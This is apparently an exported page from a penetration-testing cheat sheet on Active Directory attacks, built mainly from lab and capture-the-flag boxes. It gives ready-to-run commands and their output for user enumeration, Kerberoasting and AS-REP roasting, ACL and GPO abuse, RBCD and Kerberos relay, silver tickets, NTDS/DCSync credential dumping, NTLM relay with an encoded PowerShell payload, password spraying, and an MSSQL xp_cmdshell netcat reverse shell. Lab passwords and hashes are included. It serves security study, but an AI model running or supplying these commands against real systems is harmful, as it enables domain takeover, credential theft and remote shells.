linux

NTP

#update time
ntpdate IP_DC
rdate -n IP_DC
ntpdate -v pool.ntp.org

NetBIOS - 139/445

query the NetBios name service for valide name

sudo nbtscan -r 192.168.50.0/24
Doing NBT name scan for addresses from 192.168.50.0/24

IP address       NetBIOS Name     Server    User             MAC address
------------------------------------------------------------------------------
192.168.50.124   SAMBA            <server>  SAMBA            00:00:00:00:00:00
192.168.50.134   SAMBAWEB         <server>  SAMBAWEB         00:00:00:00:00:00
...

SMB - 445

Shares

smbmap

enumerate share folder recursive on depth

smbmap -u stephanie -p 'LegmanTeamBenzoin!!' -d corp.com -H 192.168.153.73 -r docshare --depth 5

crackmapexec

list structure of all shares folder recursively

crackmapexec smb 10.10.176.146 -u sql_svc -p Dolphin1 -M spider_plus

Smbclient

#-------------------------------null session
#download all direcotries with files recursively
smbclient //192.168.45.20/share  -c 'prompt; recurse; mget *' -N


#--------------------------------authenticated

#authenticate with domain creds 
smbclient //192.168.50.21/shares -U domain.local/user --password='test'

#authenticate by passing the hash
smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b

RID Cycling attack

perform a RID Cycling attack to enumerate users by abusing smb null sessions

nxc

netexec smb 10.10.11.231 -u guest -p '' --rid-brute 

SMB 10.10.11.231 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False) 
SMB 10.10.11.231 445 DC01 [+] rebound.htb\guest: 
SMB 10.10.11.231 445 DC01 498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup) 
SMB 10.10.11.231 445 DC01 500: rebound\Administrator (SidTypeUser) 
SMB 10.10.11.231 445 DC01 501: rebound\Guest (SidTypeUser) 
SMB 10.10.11.231 445 DC01 502: rebound\krbtgt (SidTypeUser)

By default, typical RID cycle attacks go up to RID 4000. For a larger domain, it may be necessary to expand that, so I’ll switch to lookupsid.py (though netexec works as well by adding the max number to the option like --rid-brute 10000)

lookupsid

lookupsid.py -no-pass '[email protected]' 20000 

Impacket v0.10.1.dev1+20230608.100331.efc6a1c3 - Copyright 2022 Fortra [*] Brute forcing SIDs at rebound.htb 
[*] StringBinding ncacn_np:rebound.htb[\pipe\lsarpc] 
[*] Domain SID is: S-1-5-21-4078382237-1492182817-2568127209 
498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup) 500: rebound\Administrator (SidTypeUser) 
501: rebound\Guest (SidTypeUser) 
502: rebound\krbtgt (SidTypeUser)

run the same previous command but list users in a file

lookupsid.py -no-pass '[email protected]' 8000 | grep SidTypeUser | cut -d' ' -f2 | cut -d'\' -f2 | tee users

impacket-lookupsid -domain-sids -no-pass -target-ip 10.10.103.169 phantom.vl/'daz'@10.10.103.169 | cut -d '\' -f 2 | awk 'NR >= 29 {print $1}' > full_ul.txt

Execute commands

crackmapexec

execute commands

crackmapexec smb 10.10.176.148 -u sql_svc  -p Dolphin1 -x "whoami"

change user password

Smbpasswd

resetting an expired password remotely

smbpasswd -r 10.10.88.63 -U "Caroline.Robinson"
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user Caroline.Robinson

Kerberos - 88

Enumerate users

kerbrute

kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt

AS-Rep-Roast

GetNPUsers

impacket-GetNPUsers -usersfile users rebound.htb/ -dc-ip 10.10.11.231

netexec

netexec ldap 10.10.11.231 -u users -p '' --asreproast asrephashes.txt 

SMB 10.10.11.231 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False) LDAP 10.10.11.231 445 DC01 [email protected]:878af35ccf86b307eeddf59c....

Kerberoasting

GetUserSns

impacket-GetUserSPNs test.local/john:password123 -dc-ip 10.10.10.1 -request -outputfile sqldev_tgs

ACLs

Enumerating ACLs and GPO

powerview

Get-ObjectACL -SamAccountName "engineering" -ResolveGUIDs

means that mayrosec/Sales have GenericAll over Engineering users

#converting user to SID
$sid=Convert-NameToSid "Hacker_user"
=> this user suppose have a bad gpo and we want to dermine which ACls that he has

#enumerate GPO user
Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}

=> go to bloodhound to determine this gpo which object is linked

Force Change password

powerview

#login as user support
powerview blackfield.local/support:'passwordHere'@10.10.10.192 --dc-ip 10.10.10.192 -d  --use-ldap

#changing password of user AUDIT2020
(LDAP)-[DC01.BLACKFIELD.local]-[BLACKFIELD\support]
PV > Set-DomainUserPassword -Identity AUDIT2020 -AccountPassword "passwordHere"

rpcclient

rpcclient -U blackfield/support 10.10.10.192 
rpcclient $> setuserinfo audit2020 23 H@CKTHEB0X#

WriteOwner

powerview

#abuse WriteOwner
Set-DomainObjectOwner -TargetIdentity claire -PrincipalIdentity tom

#add ResetPassword acl for claire user
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword

#change claire user password
Set-DomainUserPassword -Identity claire -AccountPassword "1ts-mag1c!!"

WriteDacl

powerview

abusing WriteDacl to add uses in group

#abuse writedact by adding write member acl to user claire
Add-DomainObjectAcl -TargetIdentity "BACKUP_ADMINS" -Rights WriteMembers -PrincipalIdentity claire

#add user tom to backup_admin groups
Add-DomainGroupMember -Identity 'BACKUP_ADMINS' -Members 'tom'

#check if tom user was added 
Get-DomainGroupMember -Identity 'BACKUP_ADMINS'

abusing WriteDacl to change password

#abuse writedact by adding all permissions acl to user claire
Add-DomainObjectAcl -TargetIdentity "BACKUP_ADMINS" -Rights All -PrincipalIdentity claire

#changing password
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force  
Set-DomainUserPassword -Identity GPOADM -AccountPassword $UserPassword

GenricALL

over machine

like the image bellow

create a new computer in the domain

impacket-addcomputer resourced.local/l.livingstone -dc-ip 192.168.167.175 -hashes :19a3a7550ce8c505c2d46b5e39d6f808 -computer-name 'ATTACK$' -computer-pass 'AttackerPC1!'

Verify if the new machine has been created or not

get-adcomputer attack

add msDS-AllowedToActOnBehalfOfOtherIdentity

impacket-rbcd -action write -delegate-to "RESOURCEDC$" -delegate-from "ATTACK$" -dc-ip 192.168.231.175 -hashes :19a3a7550ce8c505c2d46b5e39d6f808 resourced.local/l.livingstone

confirm if the property has been added

Get-adcomputer resourcedc -properties msds-allowedtoactonbehalfofotheridentity |select -expand msds-

get the administrator ticket

impacket-getST -spn 'cifs/resourcedc.resourced.local' -impersonate 'Administrator' 'resourced.local/Arrack$:Password123'

#export his ticket
export KRB5CCNAME=./Administrator.ccache

#authenticate with his ticket
sudo impacket-psexec -k -no-pass resourcedc.resourced.local -dc-ip 192.168.167.175

#dumping ntds
impacket-secretsdump -k -no-pass resourcedc.resourced.local -dc-ip 192.168.231.175

AllowedToActOnBehalfOfOtherIdentity

This privilege essentially allows us to act on behalf of the domain controller, and request for service tickets on behalf of that domain computer. This privilege in particular allows us to exploit RBCD (resource-based constrained delegation), which can allow us to compromise the domain controller. We’ve done this exploit in the past on other machines, and it seems as though this is the same type of attack path here.

check MAQ value if we have the ability to create a machine in the domain

crackmapexec ldap 10.10.103.169 -u crose -p 'Password123@' -M maq  
SMB         10.10.103.169   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)  
LDAP        10.10.103.169   389    DC               [+] phantom.vl\crose:Password123@   
MAQ         10.10.103.169   389    DC               [*] Getting the MachineAccountQuota  
MAQ         10.10.103.169   389    DC               MachineAccountQuota: 0

RBCD Through SPN-less User

At a low-level, if we are able to obtain the ticket session key and change that key to be the password hash of our controlled user, we can utilize User-2-User authentication to trick the DC into delegating a service ticket to us. We can combine both U2U and S4U2Proxy to obtain this ticket, and then use it to dump the LSA secrets of the domain controller. This is due to how the KDC interprets ticket session keys that are passed in as NT hashes for a user, allowing them to be treated as computer objects in a sense.

So to start, we’ll get the current TGT of the user in order to discover the ticket session key.

impacket-getTGT -hashes :$(pypykatz crypto nt 'Password123@') phantom.vl/crose   
Impacket v0.12.0.dev1 - Copyright 2023 Fortra  
  
[*] Saving ticket in crose.ccache

We can then use describeTicket.py to obtain the ticket session key based on the service ticket for this user.

python3 describeTicket.py crose.ccache | grep 'Ticket Session Key'  
[*] Ticket Session Key            : 4abd87ab347a96df9a497689a79bfd5c

Now let’s change the user’s password once more to match the hash of the ticket session key that we just received.

impacket-smbpasswd -newhashes :4abd87ab347a96df9a497689a79bfd5c phantom.vl/crose:'Password123@'@dc.phantom.vl  
Impacket v0.12.0.dev1 - Copyright 2023 Fortra  
  
===============================================================================  
  Warning: This functionality will be deprecated in the next Impacket version    
===============================================================================  
  
[*] NTLM hashes were changed successfully.

Now that the NTLM hash was set with the same value of our ticket session key, we should be able to use RBCD as intended.

 impacket-rbcd -delegate-from 'crose' -delegate-to 'DC$' -dc-ip 10.10.103.169 -action 'write' 'phantom.vl'/'crose' -hashes :4abd87ab347a96df9a497689a79bfd5c  
Impacket v0.12.0.dev1 - Copyright 2023 Fortra  
  
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty  
[*] Delegation rights modified successfully!  
[*] crose can now impersonate users on DC$ via S4U2Proxy  
[*] Accounts allowed to act on behalf of other identity:  
[*]     crose        (S-1-5-21-4029599044-1972224926-2225194048-1126)

Now that the account is able to delegate on behalf of the DC, we can request a service ticket as we normally would with our controlled user. The only difference here is that we’ll use the -u2u option so that the KDC interprets our login attempt as a domain user authentication attempt. We’ll also impersonate the Administrator account so that we can dump the secrets of the domain controller.

export KRB5CCNAME=crose.ccache  
  
impacket-getST -u2u -impersonate Administrator -spn 'cifs/dc.phantom.vl' -k -no-pass phantom.vl/'crose'  
Impacket v0.12.0.dev1 - Copyright 2023 Fortra  
  
[*] Impersonating Administrator  
[*] Requesting S4U2self+U2U  
[*] Requesting S4U2Proxy  
[*] Saving ticket in Administrator@[email protected]

dump NTDS

export KRB5CCNAME=Administrator@[email protected]  
  
└─$ impacket-secretsdump -k dc.phantom.vl  
......  
[*] Using the DRSUAPI method to get NTDS.DIT secrets  
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[...snip...]:::

Recycle Bin Group Abuse

#filtering only deleted objects with the isDeleted propert
Get-ADObject -ldapfilter "(&(isDeleted=TRUE))" -IncludeDeletedObjects

#filter can be appplied to retrieve user account only by using objectclass property
Get-ADObject -ldapfilter "(&(objectclass=user)(isDeleted=TRUE))" -IncludeDeletedObjects

#set specific account user to display more information and properties
Get-ADObject -ldapfilter "(&(objectclass=user)(DisplayName=TempAdmin) (isDeleted=TRUE))" -IncludeDeletedObjects -Properties *

#retreive all deleted expext object (group,users,..)
Get-ADObject -filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property * 

#restor deleted objects,creating new CN but samaccount will be the same
restore-adobject -identity <ObjectGUID> -newname liza.deleted

GenericWrite

#authenticate
python3 /opt/powerview.py/powerview.py MEGACORP/sbauer:'D3veL0pM3nT!'@10.10.10.179 --dc-ip 10.10.10.179 -d  --use-ldap

#set iser JORDEN as SPN
#set tatget user "jorden" as SPN service to get his TGT and crack it
Set-DomainObject -Identity "JORDEN" -Set "serviceprincipalname=http/BLAHBLAH"

#get TGT ticket of user "jorden"
python3 targetedKerberoast.py -v -d 'MEGACORP.LOCAL' -u 'sbauer' -p 'D3veL0pM3nT!'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (jorden)
[+] Printing hash for (jorden)

Laps

ldapsearch

ldapsearch -v -c -D [email protected] -w CrabSharkJellyfish192 -b "DC=hutch,DC=offsec" -H ldap://$IP "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd

Constrained delegation

find delegation using impacket-findDelegation

impacket-findDelegation 'rebound.htb/delegator$' -dc-ip 10.10.11.231 -k -hashes :43e9069a73081ecfcbe1514e1d4e3bc8

Impacket v0.12.0.dev1+20240308.164415.4a62f39 - Copyright 2023 Fortra 
[*] Getting machine hostname 
[-] CCache file is not found. Skipping... 
[-] CCache file is not found. Skipping... 
AccountName   AccountType                       DelegationType  DelegationRightsTo
----------- ----------------------------------- -------------- --------------------
delegator$ ms-DS-Group-Managed-Service-Account Constrained http/dc01.rebound.htb

abusing delegation to get TGS ticket by impersonating the administrator

getST.py -spn http/dc01.rebound.htb -impersonate TARGET_USER DOMAIN/USERNAME:PASSWORD

without protocol transition, the service can only access resources on the delegated server as the original user and that means that we wouldn’t be able to abuse this just by requesting a ticket with getST from Impacket.

Abusing GPOs

support we have WriteDacl on Default Domain Policy gpo

using SharpGPOAbuse

.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount charlotte --GPOName "DEFAULT DOMAIN POLICY"
[+] Domain = secura.yzx
[+] Domain Controller = dc01.secura.yzx
[+] Distinguished Name = CN=Policies,CN=System,DC=secura,DC=yzx
[+] SID Value of charlotte = S-1-5-21-3453094141-4163309614-2941200192-1104
[+] GUID of "DEFAULT DOMAIN POLICY" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\secura.yzx\SysVol\secura.yzx\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!

#to fors the update
gpupdate /force

using pygpoabuse

python3 pygpoabuse.py baby2.vl/GPOADM:'Password123!' -gpo-id "31B2F340-016D-11D2-945F-00C04FB984F9" -command 'net localgroup administrators GPOADM /add' -f

Passwords spraying

crackmapexec

using usernmes files and password files

crackmapexec smb 10.10.10.10 -u ./users.txt -p ./passwords.txt --continue-on-success

default passwords "usernames in passwords"

crackmapexec smb 10.10.10.10 -u ./users.txt -p ./users.txt --continue-on-success --no-bruteforce

Relaying Net-NTLMv2

running ntlmrelayx

impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc JABjAGwAaQBlAG4AdA..." 
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
...
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections

and running nc

kali@kali:~$ nc -nvlp 8080 
listening on [any] 8080 ...

performing relaying in target machine

C:\Windows\system32>whoami
whoami
files01\files02admin

C:\Windows\system32>dir \\192.168.119.2\test
...

To use NtlmrelayAttack that ntlmhash user we relay it to the target machine should be and admin local there if not we cannot execute command instead we can got just an semi smb interactive shell like the example bellow in the image

Howerver, we get rpc access denied error and code execution is not succeeded. This is because the svc_web_staging user isn’t a local administrator on the target host. Despite the direct code execution isn’t successful, we can still try accessing the SMB shares on the dc01 host in the context of svc_web_staging user.

impacket-ntlmrelayx --no-http-server -smb2support -t dc01.reflection.vl -i

=> We can then access to the SMB shares on 127.0.0.1:11000.

In the share, there is a file seemed to be a config for production database.

Silver Tickets

  • generating ntlm hash with password with this online tool

  • getting SID of spn user Get-LocalUser -Name $env:USERNAME | Select sid

enumerate SID

enuemrate SID
nxc ldap -u -p --get-sid

rpcclient -U htb.local\\james%'J@m3s_P@ssW0rd!' 10.10.10.52 
rpcclient $> lookupnames james

usage of impacket ticketer tool

ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
#generating silver tikcet
impacket-ticketer -nthash 1443EC19DA4DAC4FFC953BCA1B57B4CF -domain-sid S-1-5-21- 4078382237-1492182817-2568127209 -domain sequel.htb -dc-ip dc.sequel.htb -spn nonexistent/DC.SEQUEL.HTB Administrator


export KRB5CCNAME=Administrator.ccache
impacket-mssqlclient -k dc.sequel.htb

DCSync

impacket-secrtesdup

impacket-secretsdump -outputfile ntds_hashes htb.local/baiz:'Password123!'@10.10.10.161

Kerberos Relay

if the user have tje MAQ value 10 to be able to create a domain machine

nxc ldap 10.10.73.8 -u 'svc_scan' -p 'pass' -M maq  
SMB         10.10.73.8      445    BRUNODC          [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)                                                                                                     
LDAP        10.10.73.8      389    BRUNODC          [+] bruno.vl\svc_scan:[...snip...]  
MAQ         10.10.73.8      389    BRUNODC          [*] Getting the MachineAccountQuota  
MAQ         10.10.73.8      389    BRUNODC          MachineAccountQuota: 10

Furthermore, the LDAP does not have signing enabled. This cements the fact that a Kerberos relay attack is possible through KrbRelayUp.

 nxc ldap 10.10.73.8 -u 'svc_scan' -p '[...snip...]' -M ldap-checker  
SMB         10.10.73.8      445    BRUNODC          [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)                                                                                                     
LDAP        10.10.73.8      389    BRUNODC          [+] bruno.vl\svc_scan:[...snip...]  
LDAP-CHE... 10.10.73.8      389    BRUNODC          LDAP Signing NOT Enforced!  
LDAP-CHE... 10.10.73.8      389    BRUNODC          LDAPS Channel Binding is set to "NEVER"

A Kerberos relay attack is essentially an authentication attack much like NTLM relay that allows us to relay a domain objects Kerberos authentication to another service. This essentially allows us to relay an ASREQ to any SPN that we need to authenticate to. Where LDAP signing essentially plays a picture into this is that it will encrypt all traffic over LDAP, meaning we won’t be able to properly sniff the traffic for authentication tokens as a MITM

In particular, the CLSID I picked was d99e6e73-fc88-11d0-b498-00a0c90312f3. We’ll need to compile KrbRelayUp in order to exploit this on the target machine. Luckily enough, Defender is not enabled on this box so we shouldn’t have to bypass AV for this.

PS C:\temp> "Invoke-Mimikatz"  
"Invoke-Mimikatz"  
Invoke-Mimikatz

So once we have the KrbRelayUp binary compiled, we’ll execute it on the target machine using the CLSID that we have selected.

PS C:\temp> .\KrbRelayUp.exe relay -Domain bruno.vl -CreateNewComputerAccount -ComputerName daz$ -ComputerPassword Password123@ --clsid d99e6e73-fc88-11d0-b498-00a0c90312f3  
.\KrbRelayUp.exe relay -Domain bruno.vl -CreateNewComputerAccount -ComputerName daz$ -ComputerPassword Password123@ --clsid d99e6e73-fc88-11d0-b498-00a0c90312f3  
KrbRelayUp - Relaying you to SYSTEM  
  
  
[+] Rewriting function table  
[+] Rewriting PEB  
[+] Init COM server  
[+] Computer account "daz$" added with password "Password123@"  
[+] Looking for available ports..  
[+] Port 2869 available  
[+] Register COM server  
[+] Forcing SYSTEM authentication  
[+] Got Krb Auth from NT/SYSTEM. Relying to LDAP now...  
[+] LDAP session established  
[+] RBCD rights added successfully  
[+] Run the spawn method for SYSTEM shell:  
./KrbRelayUp.exe spawn -m rbcd -d bruno.vl -dc brunodc.bruno.vl -cn daz$ -cp Password123@

We’ll then execute the command provided so that a TGT request can be sent to the KDC. This allows us to use getST after this command to retrieve a TGS on behalf of the Administrator account to CIFS using our fake machine account.

impacket-getST -spn cifs/brunodc.bruno.vl -impersonate Administrator -dc-ip 10.10.116.111 bruno.vl/'daz$':'Password123@'  
Impacket v0.12.0.dev1 - Copyright 2023 Fortra  
  
[*] Getting TGT for user  
[*] Impersonating Administrator  
[*] Requesting S4U2self  
[*] Requesting S4U2Proxy  
[*] Saving ticket in Administrator@[email protected]

using secrets dump

export KRB5CCNAME=Administrator@[email protected]  
  
impacket-secretsdump -k brunodc.bruno.vl                                                                         
Impacket v0.12.0.dev1 - Copyright 2023 Fortra  
  
[*] Service RemoteRegistry is in stopped state  
[*] Starting service RemoteRegistry  
[*] Target system bootKey: 0xf58ac639976f0c99c2dde0d24ef3219d  
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)  
......  
Administrator:500:aad3b435b51404eeaad3b435b51404ee:13735[...snip...]bfd4:::

Dumping NTDS

dumping ntds using kerberos ticket

export KRB5CCNAME=./Administrator.ccache
impacket-secretsdump -k -no-pass resourcedc.resourced.local -dc-ip 192.168.231.175

dumping ntfd localy

impacket-secretsdump -ntds /root/ntds.dit -system /root/SYSTEM LOCAL

Ldap - 389/636

Powerview

authenticate using valid creds

powerview rebound.htb/oorend:'1GR8t@$$4u'@rebound.htb
PV >

=> in case of error ind not successful - invalidCredentials [ERROR_ACCOUNT_LOCKED_OUT]

use -k option

powerview rebound.htb/oorend:'1GR8t@$$4u'@rebound.htb -k 
[2024-03-19 01:07:37] LDAP Signing NOT Enforced! (LDAPS)-[rebound.htb]-[rebound\oorend] 

PV >

Enumerate ACL

PV > Get-DomainObjectAcl -Identity ServiceMGMT ...[snip]... ObjectDN : 

CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb 
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7683 
ACEType : ACCESS_ALLOWED_ACE 
ACEFlags : None 
ActiveDirectoryRights : Self 
AccessMask : 0x8 
InheritanceType : None 
SecurityIdentifier : oorend (S-1-5-21-4078382237-1492182817-2568127209-7682) ...[snip]...

enumerate ACL and specifying users which privileges it's has

Get-DomainObjectAcl -Identity winrm_svc -Where "SecurityIdentifier contains oorend"

Add user to a group

PV > Add-DomainGroupMember -Identity servicemgmt -Members oorend [2024-03-19 01:20:23] User oorend successfully added to servicemgmt

verify user was add to group

Get-DomainGroupMember -Identity servicemgmt

LdapSearch

#ldapsearch
ldapsearch -x -H ldap://10.10.176.146 -s base namingcontexts
ldapsearch -x -H ldap://10.10.176.146 -x -b "DC=oscp,DC=exam" -s sub "*"
ldapsearch -v -x -b "DC=hutch,DC=offsec" -H ldap://hutch.offsec "(objectclass=*)"

#enumerate users
ldapsearch -x -H ldap://10.10.10.161 -x -b "DC=htb,DC=local" -s sub "*" | grep sAMAccountName: | cut -f2 -d" "

#objecl lockout policy
ldapsearch -x -p 389 -h 10.10.10.169 -b "dc=megabank,dc=local" -s sub "*" | grep lock

#enumerate commented object '#' and remove all regex cracters 
ldapsearch -x -b "DC=baby,DC=vl" -H ldap://10.10.88.63 "*" | grep "#" | grep -oE '\b\w+\s\w+\b' | sed 's/ /./g'


#authenticated=============================================
 ldapsearch -x -H ldap://10.10.10.175 -s base '(objectclass=\*)' -w Thestrokes23 -D '[email protected]'
 
#enumerate lockout policy authenticated
ldapsearch -D 'BLACKFIELD\support' -w '#00^BlackKnight' -p 389 -h 10.10.10.192 - b "dc=blackfield,dc=local" -s sub "*" | grep lockoutThreshold

windapsearch

#enumerate all object class on AD
python3 windapsearch.py -d htb.local --dc-ip 10.10.10.161 --custom "objectClass=*"

#retrieve a list of users
python3 windapsearch.py -d resolute.megabank.local --dc-ip 10.10.10.169 -U > users

#check password stored in descriptions or other fields
windapsearch.py -d resolute.megabank.local --dc-ip 10.10.10.169 -U --full

Netexec

nxc ldap <ip> -u 'username' -p 'password' --query "(objectClass=*)" "*"

Laps

ldapsearch

ldapsearch -x -H "ldap://192.168.188.122" -D "hutch\fmcsorley" -w "CrabSharkJellyfish192" -b "dc=hutch,dc=offsec" '(ms-MCS-AdmPwd=*)' ms-MCS-AdmPwd

GMSA

netexec

netexec ldap rebound.htb -u tbrady -p 543BOMBOMBUNmanda -k --gmsa

Bloodhound

bloodhound-python -d rebound.htb -c all -u oorend -p '1GR8t@$$4u' -ns 10.10.11.231 --zip --dns-tcp --dns-timeout 10

nxc ldap 172.16.201.26 -u Tracy.White -p 'zqwj041FGX' --bloodhound -c all -ns
netexec ldap 172.16.201.26 -u Tracy.White -p 'zqwj041FGX' --bloodhound -c all -ns

RPCclient - 139/137

#login null session
rpcclient 10.10.10.161 -U '' -N

#enumerate users in the domain
rpcclient> enumdomusers

#enumare user group
rpcclient> queryuser [rid_user]

#enumerate all users attribute "descreptions,name,account"
rpcclient> querydispinfo

#create users list
rpcclient -U "" <ip> -N -c "enumdomusers" | grep -oP '\[.*?\]' | grep "0x" -v | tr -d '[]' > userlist.txt

#password spraying
for u in $(cat users | awk -F@ '{print $1}' | awk -F: '{print $2}'); do rpcclient -U "$u%Welcome123!" -c "getusername;quit" 10.10.10.169 | grep Authority; done

#===================================autenticated
#enumerate user SID
rpcclient -U htb.local\\james%'J@m3s_P@ssW0rd!' 10.10.10.52 
rpcclient $> lookupnames james
james S-1-5-21-4220043660-4019079961-2895681657-1103 (User: 1)

Ldaps

Enumerate ssl certificate informations

openssl s_client -showcerts -connect 10.10.10.11:3269 | openssl x509 -noout -text

MSSQL - 1443

login as local user

mssqlclient.py INLANEFREIGHT/[email protected] -windows-auth

impacket-mssqlclient MANTIS/admin:'m$$ql_S@_P@ssW0rd!'@10.10.10.52

Enable xp_cmdshell:

EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1; 
RECONFIGURE;--

Get a shell:

EXEC xp_cmdshell "C:\Users\Public\nc64.exe -t -e C:\Windows\System32\cmd.exe <ip> <port>";--

Impersonation

SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';

linked database:

select srvname from master..sysservers

  srvname
  
--------------------------------------------------------------------------------
  
  FALCONSQL
    
  WANDASQL

#check if we are admin
select * from openquery("WANDASQL", 'SELECT is_srvrolemember(''sysadmin'')')

--------------------------------------------------------------------
0

list directories

xp_dirtree \
xp_dirtree \inetpub\wwwroot

Commands

#display version
SELECT @@version;

#display databases
SELECT name FROM sys.databases;

#display tables
SELECT * FROM offsec.information_schema.tables;

## Manual Code Execution
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXECUTE xp_cmdshell 'whoami';

Creating a TGT to impersonate administrator

So there are a few things that we’ll need to perform this, notably:

  • The NTLM hash of the svc_mssql account.

  • The domain SID of the svc_mssql account.

  • The SPN of the service we are requesting to.

  • The name of the user we want to impersonate.

get TGS administrator ticket

impacket-ticketer -nthash NTLM_HASH -domain-sid S-1-5-21-2330692793-3312915120-706255856 -dc-ip 10.10.105.115 -spn mssql/breachdc.breach.vl -domain breach.vl Administrator  
......  
[*] Saving ticket in Administrator.ccache
export KRB5CCNAME=Administrator.ccache

impacket-mssqlclient -k breachdc.breach.vl -target-ip 10.10.105.115  <br>SQL (BREACH\Administrator  dbo@master)> enable_xp_cmdshell

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell whoami  
output               
----------------     
breach\svc_mssql     
  
NULL
PreviousADNextWindows

Last updated

Was this helpful?